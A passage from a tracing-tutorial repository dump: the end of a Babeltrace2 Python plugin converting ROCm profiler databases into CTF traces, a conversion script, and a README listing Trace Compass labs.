self._stream, 278 | default_clock_snapshot=timestamp 279 | ) 280 | for field in fields: 281 | if field == "name": 282 | msg.event.payload_field[field] = fields[field] + name_suffix 283 | else: 284 | msg.event.payload_field[field] = fields[field] 285 | heappush(self._buffer, (timestamp, self._integer, msg)) 286 | self._integer += 1 287 | # Separate begin and end: enter/exit 288 | fill_and_push_msg(time_begin, fields, "_enter") 289 | # Some events have no end time 290 | if time_end >= 0: 291 | fill_and_push_msg(time_end, fields, "_exit") 292 | 293 | def __next__(self): 294 | # Reading from the current event type table if the queue buffer is empty 295 | try: 296 | # Fill the buffer to its capacity 297 | while len(self._buffer) < self._size_buffer: 298 | row = next(self._table_cursor) 299 | self._process_row(row) 300 | msg_send = heappop(self._buffer)[2] 301 | return msg_send 302 | except StopIteration: 303 | # Empty buffer 304 | while len(self._buffer) > 0: 305 | msg_send = heappop(self._buffer)[2] 306 | return msg_send 307 | self._table_cursor.close() 308 | raise StopIteration 309 | 310 | 311 | @bt2.plugin_component_class 312 | class RocmSource(bt2._UserSourceComponent, message_iterator_class=RocmAPIMessageIterator): 313 | def __init__(self, config, params, obj): 314 | # Checks what types of event are available 315 | self.connection = connect_to_db(str(params["input"])) 316 | if self.connection is None: 317 | raise Exception("Trace input not supported: {}".format(params["input"])) 318 | event_types_available = detect_input_table(self.connection) 319 | 320 | # Add performance counter to the list of fields of compute_kernels_hsa 321 | if "compute_kernels_hsa" in event_types_available: 322 | event_types_available["compute_kernels_hsa"] = add_optional_fields( 323 | self.connection, event_types_available["compute_kernels_hsa"]) 324 | 325 | # Initiliazes the metadata objects of the trace 326 | rocm_trace = self._create_trace_class() 327 | # Initializes the clock 328 | frequency = 1000000000 329 | offset = time.time() - time.clock_gettime(time.CLOCK_MONOTONIC) 330 | offset_seconds = int(offset) 331 | offset_cycles = int((offset - offset_seconds) * frequency) 332 | clock_class = self._create_clock_class( 333 | name="rocm_monotonic", 334 | frequency=frequency, # 1 GHz 335 | precision=1, # Nanosecond precision 336 | offset=bt2.ClockClassOffset(offset_seconds, offset_cycles), 337 | origin_is_unix_epoch=True, 338 | uuid=uuid.uuid4() 339 | ) 340 | for event_type in event_types_available: 341 | # Stream classes 342 | event_types_available[event_type]["stream_class"] = ( 343 | rocm_trace.create_stream_class(default_clock_class=clock_class) 344 | ) 345 | # Field classes 346 | payload_class = rocm_trace.create_structure_field_class() 347 | event_types_available[event_type]["payload_class"] = payload_class 348 | get_payload_class(event_types_available[event_type], rocm_trace, payload_class) 349 | # Event classes 350 | event_types_available[event_type]["event_class"] = ( 351 | event_types_available[event_type]["stream_class"].create_event_class( 352 | name=event_type, 353 | payload_field_class=event_types_available[event_type]["payload_class"]) 354 | ) 355 | # Same trace object for all ports 356 | trace = rocm_trace(environment={ "tracer_name": "roctracer" }) 357 | for event_type in event_types_available: 358 | self._add_output_port( 359 | "out_" + event_type, 360 | { 361 | "trace": trace, 362 | "event_type": event_types_available[event_type], 363 | "connection": self.connection 364 | } 365 | ) 366 | 367 | def _user_finalize(self): 368 | self.connection.close() 369 | 370 | 371 | bt2.register_plugin( 372 | __name__, 373 | "rocm", 374 | description="rocprofiler/roctracer format", 375 | author="Arnaud Fiorini" 376 | ) 377 | -------------------------------------------------------------------------------- /labs/304-rocm-traces/scripts/ctftrace.py: -------------------------------------------------------------------------------- 1 | import bt2 2 | import bt_plugin_rocm 3 | import os 4 | import pathlib 5 | import sys 6 | from datetime import datetime 7 | 8 | 9 | def translate_to_ctf(input_db, output): 10 | graph = bt2.Graph() 11 | 12 | plugin_path = os.path.join(pathlib.Path(__file__).parent, "bt_plugin_rocm.py") 13 | rocm_plugin = bt2.find_plugins_in_path(plugin_path, fail_on_load_error=True)[0] 14 | source_component = graph.add_component( 15 | rocm_plugin.source_component_classes["RocmSource"], 16 | "rocm_source", 17 | { "input": input_db } 18 | ) 19 | 20 | ctf_plugin = bt2.find_plugin("ctf").sink_component_classes["fs"] 21 | sink_component = graph.add_component( 22 | ctf_plugin, 23 | "ctf_sink", 24 | { "path": output, "assume-single-trace": True } 25 | ) 26 | 27 | utils_plugin = bt2.find_plugin("utils").filter_component_classes["muxer"] 28 | muxer_component = graph.add_component( 29 | utils_plugin, 30 | "muxer" 31 | ) 32 | 33 | for i, port in enumerate(source_component.output_ports): 34 | graph.connect_ports( 35 | source_component.output_ports[port], 36 | muxer_component.input_ports["in{}".format(i)] 37 | ) 38 | 39 | graph.connect_ports( 40 | muxer_component.output_ports["out"], 41 | sink_component.input_ports["in"] 42 | ) 43 | 44 | graph.run() 45 | 46 | 47 | if __name__ == "__main__": 48 | if len(sys.argv) != 2: 49 | raise Exception("Usage: " + sys.argv[0] + " ") 50 | # Generate trace name as a folder named .YYYYMMDD-hhmmss 51 | trace_name = ".".join(sys.argv[1].split(".")[:-1]) + "." + datetime.now().strftime("%Y%m%d-%H%M%S") 52 | translate_to_ctf(sys.argv[1], trace_name) 53 | -------------------------------------------------------------------------------- /labs/README.md: -------------------------------------------------------------------------------- 1 | ## Instructions 2 | 3 | This directory contains the labs that are part of this tutorial. The labs are organized into caregories and can be identified by their prefix code as follows: 4 | 5 | | Prefix Code | Lab Summary | 6 | | --- | --- | 7 | | **0xx** | Environment preparation and simple kernel trace collection | 8 | | **1xx** | Kernel trace analysis (system tracing) | 9 | | **2xx** | Simple userspace use cases (application tracing) [along with kernel] | 10 | | **3xx** | Advanced use cases (multi-machine and distributed traces) | 11 | 12 | ## Expected Lab Flow 13 | 14 | Each lab contains instructions on how to obtain a trace, so if you have the infrastructure available, you can get a trace yourself for the lab. But we also provide an [archive](TraceCompassTutorialTraces.tgz) with demo traces for all the labs, so you can import it in Trace Compass at the beginning and open them when necessary. 15 | 16 | 17 | * [001 what-is-tracing](001-what-is-tracing) 18 | * `optional` [002 install-lttng-on-ubuntu](002-install-lttng-on-ubuntu) 19 | * `optional` [003 record-kernel-trace-lttng](003-record-kernel-trace-lttng) 20 | * `optional` [004 record-kernel-trace-ftrace](004-record-kernel-trace-ftrace) 21 | * `optional` [005 record-kernel-trace-perf](005-record-kernel-trace-perf) 22 | * [006 installing-tracecompass](006-installing-tracecompass) 23 | * [101 analyze-system-tracing-in-tracecompass](101-analyze-system-trace-in-tracecompass) 24 | * [102 tracing-wget-critical-path](102-tracing-wget-critical-path) 25 | * [103 compare-package-managers](103-compare-package-managers) 26 | * [201 lttng-userspace-tracing](201-lttng-userspace-tracing) 27 | * [202 bug-hunt](202-bug-hunt) 28 | * [301 tracing-multiple-machines](301-tracing-multiple-machines) 29 | * [302 system-tracing-containers](302-system-tracing-containers) 30 | -------------------------------------------------------------------------------- /labs/TraceCompassTutorialTraces.tgz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/TraceCompassTutorialTraces.tgz --------------------------------------------------------------------------------